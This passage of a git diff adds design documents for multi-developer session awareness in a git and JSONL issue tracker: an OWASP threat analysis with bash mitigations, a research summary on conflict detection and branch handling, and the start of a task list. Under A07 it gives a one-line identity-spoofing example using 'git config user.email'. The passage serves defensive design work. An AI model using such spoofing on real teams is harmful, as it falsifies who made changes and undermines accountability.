+     val="$(printf '%s' "$val" | tr '\n' ' ')"
+     printf '%s' "$val"
+   }
+   ```
+2. **Quote ALL variable expansions**: Every `$variable` must be in double quotes. The existing scripts demonstrate this consistently — zero unquoted variable references in command positions across all three audited scripts.
+3. **Use `--` separator for git commands**: `smart-status.sh` line 324 already does this:
+   ```bash
+   "$GIT" diff "${BASE_BRANCH}...${_branch}" --name-only -- 2>/dev/null
+   ```
+   The `--` prevents file paths from being interpreted as flags. `conflict-detect.sh` MUST follow this pattern for every git command that accepts file path arguments.
+4. **Use `jq -r` for JSON extraction, never `eval` or unquoted interpolation**: All three existing scripts use `jq` safely (never `eval`). `conflict-detect.sh` must follow the same pattern.
+5. **Validate session identity format**: Before using `gituser@hostname`, validate it matches a safe character set:
+   ```bash
+   validate_session_id() {
+     local id="$1"
+     if ! printf '%s' "$id" | grep -qE '^[a-zA-Z0-9._@+-]+$'; then
+       die "Invalid session identity: contains unsafe characters"
+     fi
+   }
+   ```
+6. **Use `printf '%s'` not `echo`**: The existing scripts consistently use `printf '%s'` to avoid `echo` interpretation of escape sequences. `conflict-detect.sh` must do the same.
+
+**Severity**: HIGH if sanitization is omitted; LOW if existing patterns are followed. The codebase has strong precedent — the risk is regression in the new script.
+
+---
+
+## A04: Insecure Design
+
+**Applies**: YES — HIGH RELEVANCE
+
+**Risk**: Concurrent `bd sync` operations and the TOCTOU (time-of-check-time-of-use) gap in conflict detection create fundamental design-level vulnerabilities.
+
+**Specific attack vectors**:
+1. **Race condition in `bd sync`**: Two developers run `bd sync` simultaneously. Both read the same `.beads/issues.jsonl`, both make changes, both push. The second push either fails (if git rejects non-fast-forward) or silently overwrites the first developer's changes (if auto-merge succeeds but produces a semantically incorrect merge of JSONL lines).
+2. **TOCTOU in conflict detection**: `conflict-detect.sh` reads `file-index.jsonl` to check for overlaps, then the developer proceeds to `/plan` or `/dev`. Between the check and the actual work starting, another developer could claim the same files. The "soft block" is advisory only.
+   ```
+   T=0: Developer A runs conflict-detect.sh -> no conflicts
+   T=1: Developer B runs bd sync, claims same files
+   T=2: Developer A starts /dev, unaware of B's claim
+   ```
+3. **JSONL merge semantics**: Git treats JSONL as a text file. A standard git merge of two JSONL files that both modified the same issue line will produce a merge conflict, but if different lines were modified, git merges them cleanly — even if the changes are semantically contradictory (e.g., A closes issue X while B adds tasks to issue X).
+4. **Stale file-index**: `file-index.jsonl` is only updated during `bd sync`. A developer's file index could be hours old, making the conflict detection unreliable.
+
+**Mitigations**:
+1. **Atomic sync with lock file**: Use a lightweight lock mechanism:
+   ```bash
+   LOCK_BRANCH="beads-sync-lock"
+   # Try to create lock branch (atomic in git)
+   git branch "$LOCK_BRANCH" HEAD 2>/dev/null || \
+     die "Sync in progress by another developer — retry in 30s"
+   trap 'git branch -D "$LOCK_BRANCH" 2>/dev/null' EXIT
+   # ... perform sync ...
+   git branch -D "$LOCK_BRANCH"
+   ```
+2. **Issue-level last-modified check**: Before writing an issue back, compare `updated_at` timestamp with the version that was read. Reject if the remote version is newer (optimistic concurrency control).
+3. **Re-validate at gate entry**: The `/plan` and `/dev` entry gates should re-run conflict detection at the moment of entry, not rely on a cached result. This narrows (but does not eliminate) the TOCTOU window.
+4. **JSONL merge strategy**: Configure `.gitattributes` to use `merge=union` for JSONL files (append both sides) rather than standard merge, then run a deduplication pass:
+   ```gitattributes
+   .beads/issues.jsonl merge=union
+   .beads/file-index.jsonl merge=union
+   ```
+5. **Freshness window**: `conflict-detect.sh` should refuse to operate on `file-index.jsonl` data older than N minutes (configurable, default 5):
+   ```bash
+   INDEX_AGE=$(( $(date +%s) - $(stat -c %Y .beads/file-index.jsonl 2>/dev/null || echo 0) ))
+   if [ "$INDEX_AGE" -gt 300 ]; then
+     echo "WARNING: File index is ${INDEX_AGE}s old. Run 'bd sync' first." >&2
+   fi
+   ```
+
+**Severity**: HIGH — race conditions can cause silent data loss. The JSONL-in-git model has inherent concurrency limitations.
+
+---
+
+## A05: Security Misconfiguration
+
+**Applies**: MODERATE RELEVANCE
+
+**Risk**: Auto-detection of sync branch from `git remote show origin` could target the wrong branch, and default git configurations may not protect beads data.
+
+**Specific vectors**:
+1. **Wrong sync branch**: If `git remote show origin` returns an unexpected default branch (e.g., a developer's fork has `main` but the team uses `develop`), beads data syncs to the wrong location.
+2. **Missing `.gitattributes`**: Without explicit merge strategy configuration, JSONL merges default to line-based text merge, which can corrupt issue data.
+3. **Permissive branch protection**: If the sync branch lacks protection rules, any developer can force-push and overwrite beads history.
+
+**Mitigations**:
+1. **Explicit sync branch configuration**: Add `sync_branch` to `.beads/config.yaml` instead of auto-detecting:
+   ```yaml
+   sync:
+     branch: master  # Explicit, not auto-detected
+     auto_pull: true
+     freshness_window_seconds: 300
+   ```
+2. **Validate branch exists before sync**: `bd sync` should verify the target branch exists locally and remotely before pushing.
+3. **Ship `.gitattributes` with merge strategy**: Include in the feature implementation:
+   ```gitattributes
+   .beads/issues.jsonl merge=union
+   .beads/file-index.jsonl merge=union
+   ```
+
+**Severity**: LOW-MEDIUM — misconfiguration leads to data going to wrong branch, not direct security breach.
+
+---
+
+## A06: Vulnerable and Outdated Components
+
+**Applies**: LOW RELEVANCE
+
+**Risk**: The feature relies on `bash`, `git`, `jq`, and the `bd` CLI. These are standard system tools unlikely to have exploitable vulnerabilities in this context. However:
+
+1. **`jq` version sensitivity**: Older `jq` versions (< 1.6) have different behavior for `fromdateiso8601` and error handling.
+2. **`git merge-tree`**: Used in `smart-status.sh` — requires git >= 2.38. The new feature should document minimum versions.
+
+**Mitigations**:
+1. **Document minimum versions**: In the feature documentation:
+   ```
+   Requirements: git >= 2.38, jq >= 1.6, bash >= 3.2
+   ```
+2. **Version check at script entry**: Follow `smart-status.sh` lines 398-413 pattern for git version validation.
+
+**Severity**: LOW.
+
+---
+
+## A07: Identification and Authentication Failures
+
+**Applies**: MODERATE RELEVANCE
+
+**Risk**: Session identity (`gituser@hostname`) is not authenticated — it is self-reported. Any developer can configure `git config user.email` to any value, effectively impersonating another developer.
+
+**Specific vectors**:
+1. **Identity spoofing**: Developer sets `git config user.email "colleague@company.com"` and claims their issues.
+2. **Hostname collision**: Two developers on machines both named `DESKTOP-ABC123` (common with default Windows hostnames) produce the same session identity.
+3. **No session revocation**: If a developer leaves the team, their session identity remains in beads data with no way to invalidate it.
+
+**Mitigations**:
+1. **Prefer `git config user.email`** over hostname as primary identity — email is more unique and already required by git.
+2. **Require GPG/SSH commit signing** for beads sync commits — this provides cryptographic identity verification that cannot be spoofed without the private key.
+3. **Session fingerprint**: Combine multiple signals for a more unique identity:
+   ```bash
+   SESSION_ID="$(git config user.email)@$(hostname -s)"
+   ```
+4. **Warn on identity collision**: `conflict-detect.sh` should detect and warn when two different worktrees share the same session identity.
+
+**Severity**: MEDIUM — impersonation is possible but has limited impact (no privilege escalation, just data attribution).
+
+---
+
+## A08: Software and Data Integrity Failures
+
+**Applies**: YES — MODERATE RELEVANCE
+
+**Risk**: JSONL files pulled via `bd sync` are not validated for structural integrity before being applied. A malformed or maliciously crafted JSONL file could corrupt the local beads database.
+
+**Specific vectors**:
+1. **Malformed JSONL**: A truncated sync (network failure mid-pull) leaves `issues.jsonl` with a partial last line. The `bd` daemon imports this and corrupts SQLite (`beads.db` is 2.7MB per current state).
+2. **Schema violation**: A developer using a different beads version writes JSONL with fields the local version does not expect, causing parse failures.
+3. **Excessive data injection**: A malicious JSONL line with a multi-megabyte `description` field could cause memory exhaustion in `jq` or the `bd` daemon.
+
+**Mitigations**:
+1. **JSONL line validation before import**: Validate each line is valid JSON before importing:
+   ```bash
+   while IFS= read -r line; do
+     printf '%s' "$line" | jq empty 2>/dev/null || {
+       echo "WARNING: Skipping malformed JSONL line" >&2
+       continue
+     }
+   done < .beads/issues.jsonl
+   ```
+2. **Field size limits**: Reject JSONL lines where any single field exceeds a threshold (e.g., 64KB per line).
+3. **Backup before sync**: Before applying pulled changes, copy current state:
+   ```bash
+   cp .beads/issues.jsonl ".beads/issues.jsonl.bak.$(date +%s)"
+   ```
+4. **Schema version header**: Add a version field to JSONL metadata so version mismatches are detected early.
+
+**Severity**: MEDIUM — data corruption is the primary risk, not code execution.
+
+---
+
+## A09: Security Logging and Monitoring Failures
+
+**Applies**: YES — HIGH RELEVANCE
+
+**Risk**: Currently there is no audit trail for who claimed what issue, when file-index entries were modified, or when conflict detection was overridden. The existing `beads-context.sh` records stage transitions via `bd comments add` (line 265), but there is no equivalent for sync operations or conflict overrides.
+
+**Specific gaps**:
+1. **No sync log**: When `bd sync` pushes/pulls, there is no record of what changed, who initiated it, or whether conflicts were resolved.
+2. **No conflict override audit**: When a developer overrides a soft block at `/plan` or `/dev` entry, there is no record that they were warned and proceeded anyway.
+3. **No file-index change tracking**: When `file-index.jsonl` changes, there is no record of which developer claimed which files.
+4. **No anomaly detection**: No mechanism to detect unusual patterns (e.g., a developer claiming 50 files, or frequent reassignment of issues).
+
+**Mitigations**:
+1. **Sync event log**: Create `.beads/sync-log.jsonl` (append-only) recording every sync operation:
+   ```json
+   {"timestamp":"2026-03-22T10:00:00Z","actor":"dev@host","action":"push","issues_changed":["forge-abc"],"files_changed":3}
+   {"timestamp":"2026-03-22T10:05:00Z","actor":"dev2@host2","action":"pull","conflicts_detected":1,"conflicts_overridden":0}
+   ```
+2. **Conflict override recording**: When a developer proceeds past a soft block, record it via `bd comments add`:
+   ```bash
+   bd comments add "$ISSUE_ID" \
+     "CONFLICT_OVERRIDE: Proceeded despite overlap with $CONFLICTING_ISSUE on files: $OVERLAP_FILES"
+   ```
+3. **File claim history**: Each `file-index.jsonl` entry should include a `claimed_at` timestamp and `claimed_by` field, creating an audit trail.
+4. **Git-native audit**: Since everything is in git, `git log --follow .beads/issues.jsonl` provides a natural audit trail. Document this as the primary audit mechanism and ensure sync commits have descriptive messages:
+   ```bash
+   git commit -m "beads-sync: ${ACTOR} pushed ${CHANGE_COUNT} issue changes"
+   ```
+
+**Severity**: MEDIUM-HIGH — lack of audit trail makes it impossible to investigate disputes or detect tampering after the fact.
+
+---
+
+## A10: Server-Side Request Forgery (SSRF)
+
+**Applies**: NO
+
+**Risk**: This feature does not make HTTP requests, connect to external services, or process URLs from user input. All operations are local git and file operations. `git remote show origin` reads from git config, not from user-supplied URLs at runtime.
+
+**Mitigations**: None required.
+
+**Severity**: NOT APPLICABLE.
+
+---
+
+## Summary Matrix
+
+| OWASP ID | Category | Applies | Severity | Key Mitigation |
+|----------|----------|---------|----------|----------------|
+| A01 | Broken Access Control | YES | MEDIUM | Diff-based ownership validation, commit signing |
+| A02 | Cryptographic Failures | LOW | LOW | SHA-256 checksums, use email over hostname |
+| A03 | Injection | YES | HIGH* | Reuse `sanitize()`, quote all vars, validate session ID format |
+| A04 | Insecure Design | YES | HIGH | Optimistic concurrency, re-validate at gates, freshness window |
+| A05 | Security Misconfiguration | MODERATE | LOW-MEDIUM | Explicit sync branch config, `.gitattributes` merge strategy |
+| A06 | Vulnerable Components | LOW | LOW | Document minimum tool versions |
+| A07 | Identification Failures | MODERATE | MEDIUM | Prefer email identity, require commit signing |
+| A08 | Data Integrity Failures | MODERATE | MEDIUM | JSONL validation, backup before sync, field size limits |
+| A09 | Logging Failures | YES | MEDIUM-HIGH | Sync event log, conflict override recording, descriptive commits |
+| A10 | SSRF | NO | N/A | Not applicable |
+
+*A03 severity is HIGH if sanitization is omitted, LOW if existing patterns are followed.
+
+---
+
+## Recommended Implementation Order
+
+| Priority | OWASP | Action | Effort | Blocks |
+|----------|-------|--------|--------|--------|
+| 1 | A03 | Copy `sanitize()` into `conflict-detect.sh`, validate session ID format | Low | Prevents code execution |
+| 2 | A04 | Implement freshness window and re-validate at gate entry | Medium | Prevents silent data loss from TOCTOU |
+| 3 | A09 | Add `sync-log.jsonl` and conflict override recording | Medium | Enables auditability |
+| 4 | A01 | Diff-based ownership validation on sync pull | Medium | Prevents cross-developer tampering |
+| 5 | A08 | JSONL validation and backup-before-sync | Low | Prevents data corruption |
+| 6 | A04 | Optimistic concurrency control via `updated_at` | High | Prevents race condition data loss |
+| 7 | A07 | Use email as primary identity, document signing | Low | Reduces impersonation risk |
+| 8 | A05 | Explicit sync branch config, `.gitattributes` | Low | Prevents misconfiguration |
+| 9 | A02 | SHA-256 checksums for JSONL files | Low | Adds integrity verification |
+| 10 | A06 | Document minimum tool versions | Low | Compatibility |
+
+---
+
+## Existing Codebase Security Patterns to Preserve
+
+The current scripts establish strong security patterns that `conflict-detect.sh` MUST follow:
+
+| Pattern | Source File | Lines | Description |
+|---------|------------|-------|-------------|
+| `sanitize()` | `dep-guard.sh` | 69-83 | Strips `$(...)`, backticks, semicolons, quotes, newlines |
+| `set -euo pipefail` | All three scripts | Line 1 | Fail on error, unset vars, pipe failures |
+| `printf '%s'` over `echo` | All three scripts | Throughout | Prevents escape sequence interpretation |
+| `--` separator in git commands | `smart-status.sh` | 324 | Prevents argument injection via file paths |
+| `jq` for JSON parsing (never `eval`) | All three scripts | Throughout | Safe structured data extraction |
+| Double-quoted variable expansions | All three scripts | Throughout | Prevents word splitting and globbing |
+| `die()` for error exits | All three scripts | Early lines | Consistent error handling |
+| OWASP A03 comment header | All three scripts | Header block | Documents security intent |
+| `bd_update()` wrapper with output validation | `dep-guard.sh`, `beads-context.sh` | 87-106 / 58-77 | Catches silent failures from `bd` CLI |
+
+---
+
+## Comparison with GitHub Actions Sync Analysis
+
+The prior analysis (`2026-03-21-issue-sync-owasp-analysis.md`) covers a different attack surface: GitHub Actions workflows triggered by issue events. Key differences:
+
+| Aspect | GitHub Actions Sync | Multi-Dev Session Awareness |
+|--------|--------------------|-----------------------------|
+| Trust boundary | GitHub users (public) | Git contributors (team) |
+| Execution context | GitHub-hosted runner | Developer local machine |
+| Primary A03 vector | `${{ }}` interpolation in `run:` blocks | Shell variable expansion in bash scripts |
+| Primary A04 vector | Concurrent workflow runs | Concurrent `bd sync` + TOCTOU at gates |
+| Primary A01 vector | Any issue opener triggers write | Any git pusher can modify JSONL |
+| SSRF relevance | Low (GitHub API only) | None |
+
+Both analyses share the same JSONL integrity concerns (A08) and logging gaps (A09).

--- a/docs/plans/2026-03-22-multi-dev-awareness-research.md
+++ b/docs/plans/2026-03-22-multi-dev-awareness-research.md
@@ -1,0 +1,308 @@
+# Multi-Developer Session Awareness — Research Summary
+
+**Date:** 2026-03-22
+**Purpose:** Research-only — no code written. Findings to inform design of multi-developer session awareness in a git-based issue tracker (Beads/JSONL).
+
+---
+
+## 1. Git Multi-Developer Conflict Detection Best Practices
+
+### Key Patterns
+- **Feature branch isolation** is the primary prevention strategy — each developer/agent works on an isolated branch, merging via PR.
+- **Regular integration sessions** reduced conflicts by 50% in enterprise case studies.
+- **Small, self-contained commits** make conflicts easier to identify and resolve.
+- **`git merge-tree`** performs merge entirely in memory without affecting working directory or index — ideal for scripted conflict prediction without side effects.
+- **`git merge --no-commit --no-ff`** is the simpler dry-run approach but modifies the index temporarily.
+
+### Pitfalls
+- Stale feature branches cause 75% of enterprise merge conflicts.
+- Tools that hardcode branch names (e.g., looking for "main" or "master") instead of checking remote HEAD fail on renamed defaults.
+
+### Applicability
+- `git merge-tree` is the best fit for our bash-script approach: no side effects, no external services, scriptable output parsing.
+- Overlap detection via `git diff --name-only branch1...branch2` gives file-level overlap cheaply.
+
+**Sources:**
+- [DevGex: Conflict Detection Dry-Run](https://devgex.com/en/article/00017592)
+- [DEV Community: Navigating Git Conflicts](https://dev.to/code_heisenberg/navigating-git-conflicts-best-practices-to-prevent-code-loss-in-development-teams-3h6g)
+- [Atlassian: Merge Conflicts](https://www.atlassian.com/git/tutorials/using-branches/merge-conflicts)
+
+---
+
+## 2. JSONL File Merge Strategies for Git
+
+### Key Patterns
+- **Append-only JSONL** is naturally merge-friendly: each line is independent, so concurrent appends to different lines rarely conflict.
+- **Custom git merge drivers** (e.g., `git-json-merge`) use structural 3-way merge with xdiff instead of line-by-line comparison.
+- **CRDT-based approaches** preserve all concurrent updates via multi-value registers rather than discarding one edit.
+- **Last-Write-Wins (LWW)** uses timestamps — simplest but loses data (Bob's increment erased if Alice's timestamp is later).
+
+### JSONL-Specific Strategies (for Beads `issues.jsonl`)
+- **Append-only with dedup:** Each issue gets a unique ID. On merge, if two branches add lines with the same ID, a post-merge dedup script keeps the one with the latest `updated_at` timestamp (LWW per record).
+- **Tombstone pattern** already in use: deleted issues get `"status":"tombstone"` with `deleted_at` — this is CRDT-compatible (delete wins over update if timestamps agree).
+- **Line-per-record format** means git's default merge handles most cases (non-overlapping appends auto-merge).
+
+### Pitfalls
+- Git's default merge breaks on same-line edits (e.g., two devs update the same issue simultaneously).
+- JSON structural awareness is lost in line-based diff — custom merge driver needed only if same-record conflicts are common.
+- LWW requires synchronized clocks; in practice, local timestamps are sufficient for single-team use.
+
+### Applicability
+- Our JSONL format (one issue per line, unique IDs, timestamps) is well-suited for append-only + LWW-per-record resolution.
+- A lightweight bash post-merge hook can dedup by ID, keeping latest `updated_at`.
+- No need for full CRDT complexity unless we support offline branches merging weeks of divergent edits.
+
+**Sources:**
+- [DZone: LWW vs CRDTs](https://dzone.com/articles/conflict-resolution-using-last-write-wins-vs-crdts)
+- [git-json-merge on GitHub](https://github.com/jonatanpedersen/git-json-merge)
+- [Martin Kleppmann: JSON CRDT](https://martin.kleppmann.com/2017/04/24/json-crdt.html)
+- [CRDT Dictionary](https://www.iankduncan.com/engineering/2025-11-27-crdt-dictionary/)
+
+---
+
+## 3. Git Worktree Multi-User Coordination Patterns
+
+### Key Patterns
+- **Worktree-per-agent/developer** is the emerging standard: each gets its own workspace, branch, staging area — no file-level collisions possible.
+- **Shared git object database:** All worktrees share the same `.git` directory — cheap on disk, but means lock contention on `index.lock` and ref updates.
+- **Specialized agent roles** (Architect, Builder, Validator) with shared planning documents for coordination.
+- **Emerging tooling:** `ccswarm` (Claude Code multi-agent orchestration), `agentree`, `worktree-cli` with MCP integration.
+
+### Pitfalls
+- **Worktree confusion:** Easy to make changes in the wrong worktree — need clear naming conventions.
+- **Shared state race conditions:** Database files (like SQLite), Docker state, cache dirs are NOT isolated between worktrees.
+- **Regular pruning needed:** `git worktree prune` to clean up stale worktrees.
+- **Same branch restriction:** Two worktrees cannot check out the same branch simultaneously.
+
+### Applicability
+- Forge already uses `.worktrees/<slug>` pattern (confirmed: 3 active worktrees in this repo).
+- Beads SQLite (`beads.db`) is in the main `.beads/` directory — shared across worktrees. This is a potential race condition point.
+- Session awareness should detect active worktrees via `git worktree list` and warn about file overlaps.
+
+**Sources:**
+- [Git Worktree Documentation](https://git-scm.com/docs/git-worktree)
+- [ccswarm: Multi-agent orchestration](https://github.com/nwiizo/ccswarm)
+- [Vibehackers: Worktrees Multi-Agent Development](https://vibehackers.io/blog/git-worktrees-multi-agent-development)
+- [Nick Mitchinson: Worktrees for Multi-Feature Development](https://www.nrmitchi.com/2025/10/using-git-worktrees-for-multi-feature-development-with-ai-agents/)
+
+---
+
+## 4. Detecting Overlapping File Changes Across Branches
+
+### Key Patterns
+- **`git diff --name-only branch1...branch2`** — lists files changed in branch2 since it diverged from branch1. Comparing two feature branches requires finding their common ancestor with main.
+- **`git diff --name-status`** — adds change type (Added/Modified/Deleted) to each file.
+- **Cross-branch overlap detection algorithm:**
+  1. For each active worktree/branch, get changed files: `git diff --name-only $(git merge-base main feat/X)..feat/X`
+  2. Compute set intersection across all branch file lists
+  3. Files appearing in 2+ branches are "overlap candidates"
+- **`git merge-tree`** — goes deeper than file-level: detects line-level conflicts without touching working directory.
+- **GitKraken's conflict prevention** scans branch against target to identify overlapping changes before PR — conceptually what we want in CLI form.
+
+### Pitfalls
+- File-level overlap != actual conflict (two branches can modify different parts of the same file without conflicting).
+- Line-level detection via `merge-tree` is more accurate but more expensive.
+- Rename detection (`-M` flag) needed to catch files that were renamed in one branch.
+
+### Applicability
+- **Two-tier detection recommended:**
+  1. **Fast/cheap:** File-level overlap via `git diff --name-only` (run on every `/status`)
+  2. **Deep/expensive:** Line-level conflict prediction via `git merge-tree` (run on-demand or pre-merge)
+- Both are pure git commands — no external services, works in bash scripts.
+
+**Sources:**
+- [GitHub TIL: List Changed Files Between Branches](https://github.com/jbranchaud/til/blob/master/git/list-all-files-changed-between-two-branches.md)
+- [KodeKloud: Git Diff Between Branches](https://kodekloud.com/blog/git-diff-how-to-compare-files-between-two-branches/)
+- [Git Merge-Tree Documentation](https://git-scm.com/docs/git-merge-tree)
+
+---
+
+## 5. Beads Issue Tracker Sync & Branch Patterns
+
+### Key Patterns
+- **Beads architecture:** SQLite locally → JSONL export → git commit/push for distribution.
+- **Sync branch (legacy):** Older versions used a `beads-sync` branch via git worktree. This has been replaced by Dolt refs (`refs/dolt/data`).
+- **Current JSONL format (confirmed from repo):**
+  - `.beads/issues.jsonl` — one JSON object per line, each with: `id`, `title`, `status`, `priority`, `issue_type`, `owner`, `created_at`, `updated_at`, `notes`, `comments[]`, `dependencies[]`
+  - `.beads/interactions.jsonl` — separate file for interaction tracking
+  - `.beads/metadata.json` — repo-level metadata
+  - `.beads/config.yaml` — configuration
+  - `.beads/beads.db` — SQLite (primary data store, gitignored except for JSONL export)
+- **Tombstone pattern:** Deleted issues set `"status":"tombstone"` with `deleted_at`, `deleted_by`, `delete_reason` — preserves history.
+
+### Pitfalls
+- SQLite WAL files (`beads.db-shm`, `beads.db-wal`) must never be committed — they're transient.
+- Multiple worktrees sharing the same `.beads/beads.db` can cause SQLite locking issues.
+- JSONL is the git-portable format; SQLite is the fast local format. They can diverge if `bd sync` isn't run.
+
+### Applicability
+- Session awareness should track which developer/agent is modifying which issues (by `owner` field or active worktree branch).
+- JSONL append-only nature means multi-developer writes to `issues.jsonl` are mostly safe if different issues are being edited.
+- Same-issue conflicts need LWW resolution by `updated_at` timestamp.
+
+**Sources:**
+- [Beads GitHub: FAQ](https://github.com/steveyegge/beads/blob/main/docs/FAQ.md)
+- [Beads GitHub: Worktrees](https://github.com/steveyegge/beads/blob/main/docs/WORKTREES.md)
+- [Beads GitHub: Protected Branches](https://github.com/steveyegge/beads/blob/main/docs/PROTECTED_BRANCHES.md)
+- [Better Stack: Beads Guide](https://betterstack.com/community/guides/ai/beads-issue-tracker-ai-agents/)
+
+---
+
+## 6. Developer Session Tracking — Git-Native Approaches
+
+### Key Patterns
+- **Git Hours** (Node.js CLI): Groups commits into "sessions" based on time gaps between commits. Foundational approach.
+- **Git Notes** (`refs/notes/`): Attach metadata to commits without changing SHA hashes. Per-commit annotations stored as blobs, namespaced (e.g., `refs/notes/sessions`, `refs/notes/reviews`). Scriptable, shared via `git push origin refs/notes/*`.
+- **Memento** (git extension): Attaches AI session transcripts to commits as git notes — provenance chain from commit to reasoning.
+- **Git AI**: Tracks AI-generated code, links every AI-written line to agent/model/prompts via git notes stored locally or in cloud.
+- **Commit message conventions:** "The session is the commit message" — encode session metadata (start time, duration, agent ID) directly in commit messages or trailers.
+
+### Pitfalls
+- Git notes are NOT fetched by default — require explicit `git fetch origin refs/notes/*:refs/notes/*`.
+- Git notes merge conflicts are possible if two developers annotate the same commit.
+- `$HOSTNAME` and timestamp-based session IDs assume no clock skew — fine for single-team use.
+- Overly detailed session tracking creates noise; focus on actionable metadata (who, what branch, what files).
+
+### Applicability
+- **Lightweight session file** (e.g., `.beads/sessions/<hostname>-<pid>.json`) is simpler than git notes for our use case.
+- Session file contains: hostname, user, branch, worktree path, PID, start time, last heartbeat, active issue IDs.
+- Stale session detection: if `last_heartbeat` is older than threshold (e.g., 5 minutes), session is considered dead.
+- Git notes are better for long-term audit trails; session files are better for real-time awareness.
+
+**Sources:**
+- [Git Notes Documentation](https://git-scm.com/docs/git-notes)
+- [Git Notes for Metadata Tracking](https://www.dariuszparys.com/git-notes-for-metadata-and-progress-tracking/)
+- [Ris Adams: Git Notes & Trailers](https://risadams.com/blog/2025/04/17/git-notes/)
+- [Tyler Cipriani: Git Notes](https://tylercipriani.com/blog/2022/11/19/git-notes-gits-coolest-most-unloved-feature/)
+- [Blake Crosley: The Session Is the Commit Message](https://blakecrosley.com/blog/session-is-the-commit-message/)
+
+---
+
+## 7. Auto-Detecting the Default Branch from Git Remote
+
+### Methods (Ranked by Reliability)
+
+1. **`git symbolic-ref refs/remotes/origin/HEAD`** — reads the cached symbolic ref. Fast, no network. **But:** only valid after `git remote set-head origin -a` has been run at least once.
+   - Returns: `refs/remotes/origin/master` (strip prefix to get branch name)
+   - Fails if: clone is old and remote HEAD was renamed since.
+
+2. **`git remote show origin | grep 'HEAD branch'`** — queries the remote live. Always accurate. **But:** requires network access, slower (~1-2s).
+   - Output: `HEAD branch: master`
+   - Parse with: `git remote show origin | sed -n '/HEAD branch/s/.*: //p'`
+
+3. **`git config init.defaultBranch`** — reads the local git config default. **But:** only applies to new repos created locally, not clones.
+
+4. **Hardcoded fallback chain:** Check for `main`, then `master`, then `develop`. **But:** fails on repos with non-standard defaults (e.g., `trunk`, `production`).
+
+### Edge Cases
+- **Renamed default branches:** After renaming `master` → `main` on GitHub, clones still show `master` as HEAD until `git remote set-head origin -a` is run.
+- **Bare repos:** `git symbolic-ref HEAD` works directly (no remote prefix).
+- **Fork repos:** May have a different default than upstream.
+- **Claude Code bug** ([#24516](https://github.com/anthropics/claude-code/issues/24516)): Hardcodes "main" detection instead of checking remote HEAD.
+
+### Recommended Algorithm
+```bash
+get_default_branch() {
+  # Method 1: Cached symbolic ref (fast, no network)
+  local ref
+  ref=$(git symbolic-ref refs/remotes/origin/HEAD 2>/dev/null)
+  if [ -n "$ref" ]; then
+    echo "${ref#refs/remotes/origin/}"
+    return 0
+  fi
+
+  # Method 2: Query remote (slow, requires network)
+  local branch
+  branch=$(git remote show origin 2>/dev/null | sed -n '/HEAD branch/s/.*: //p')
+  if [ -n "$branch" ]; then
+    # Cache it for next time
+    git remote set-head origin "$branch" 2>/dev/null
+    echo "$branch"
+    return 0
+  fi
+
+  # Method 3: Check common names
+  for name in main master; do
+    if git show-ref --verify --quiet "refs/remotes/origin/$name" 2>/dev/null; then
+      echo "$name"
+      return 0
+    fi
+  done
+
+  # Fallback
+  echo "main"
+}
+```
+
+### Confirmed for This Repo
+- `git symbolic-ref refs/remotes/origin/HEAD` → `refs/remotes/origin/master` (works)
+- `git remote show origin | HEAD branch` → `master` (works)
+- `git config init.defaultBranch` → `master` (works)
+
+**Sources:**
+- [usethis R package: git-default-branch](https://usethis.r-lib.org/reference/git-default-branch.html)
+- [Claude Code Issue #24516](https://github.com/anthropics/claude-code/issues/24516)
+- [Git Remote Documentation](https://git-scm.com/docs/git-remote/2.17.0)
+
+---
+
+## 8. Hostname Detection Cross-Platform (Bash)
+
+### Methods (Ranked by Portability)
+
+| Method | Linux | macOS | Windows (Git Bash/MSYS2) | Notes |
+|--------|-------|-------|--------------------------|-------|
+| `hostname` command | Yes | Yes | Yes | Most portable. `-s` flag for short name. |
+| `$HOSTNAME` variable | Yes (bash) | Yes (bash) | Yes (bash) | Bash-specific; not available in sh/dash/zsh by default. |
+| `$COMPUTERNAME` | No | No | Yes | Windows environment variable; uppercase. |
+| `/etc/hostname` | Yes | No | No | Linux-only file. |
+| `/proc/sys/kernel/hostname` | Yes | No | No | Linux-only procfs. |
+| `hostnamectl` | Yes (systemd) | No | No | systemd-only. |
+| `scutil --get ComputerName` | No | Yes | No | macOS-specific. |
+
+### Confirmed for This Repo (Windows Git Bash)
+```
+HOSTNAME=Harsha-OFC
+hostname command=Harsha-OFC
+COMPUTERNAME=HARSHA-OFC   (note: uppercase)
+OS=Windows_NT
+OSTYPE=msys
+```
+
+### Recommended Cross-Platform Function
+```bash
+get_hostname() {
+  # hostname command is available on all three platforms
+  hostname -s 2>/dev/null || hostname 2>/dev/null || echo "${HOSTNAME:-${COMPUTERNAME:-unknown}}"
+}
+```
+
+### Pitfalls
+- **macOS:** `$HOSTNAME` and `hostname -s` may differ from the "Computer Name" set in System Preferences.
+- **Windows:** `$HOSTNAME` in Git Bash is case-preserved; `$COMPUTERNAME` is uppercase.
+- **hostname -s** strips the domain part (e.g., `host.example.com` → `host`). Use `-f` for FQDN.
+- **Docker/containers:** Hostname is the container ID by default unless explicitly set.
+
+**Sources:**
+- [7th Zero: Bash Platform Detection](https://7thzero.com/blog/bash-101-part-3-platform-detection-and-dynamic-run-time-command-)
+- [nixCraft: Linux Hostname](https://www.cyberciti.biz/faq/find-my-linux-machine-name/)
+- [Rosetta Code: Hostname](https://rosettacode.org/wiki/Hostname)
+- [SysTutorials: Hostname in Bash](https://www.systutorials.com/how-to-get-the-hostname-of-the-node-in-bash/)
+
+---
+
+## Key Recommendations for Multi-Dev Awareness Feature
+
+### Architecture Sketch (Not Implementation — Just Direction)
+
+1. **Session tracking:** Lightweight JSON files in `.beads/sessions/` — one per active agent/developer session. Contains hostname, PID, branch, worktree, active issues, heartbeat timestamp. Stale after 5-minute heartbeat gap.
+
+2. **Overlap detection:** On `/status` or `bd` commands, scan active sessions + `git diff --name-only` per branch to detect file-level overlaps. Warn but don't block.
+
+3. **JSONL conflict prevention:** Append-only writes with unique IDs. On merge conflicts, LWW by `updated_at` per record. Tombstones already handled correctly.
+
+4. **Default branch detection:** Use the 3-method fallback algorithm (symbolic-ref → remote show → name check).
+
+5. **Hostname:** Use `hostname -s` as primary, fallback chain for edge cases.
+
+6. **No external services:** Everything uses git commands, bash, and local files.

--- a/docs/plans/2026-03-22-multi-dev-awareness-tasks.md
+++ b/docs/plans/2026-03-22-multi-dev-awareness-tasks.md
@@ -1,0 +1,165 @@
+# Multi-Dev Session Awareness — Task List
+
+**Beads**: forge-w69s | **Branch**: feat/multi-dev-awareness | **Design**: [design doc](2026-03-22-multi-dev-awareness-design.md)
+
+---
+
+## Parallel Wave Structure
+
+```
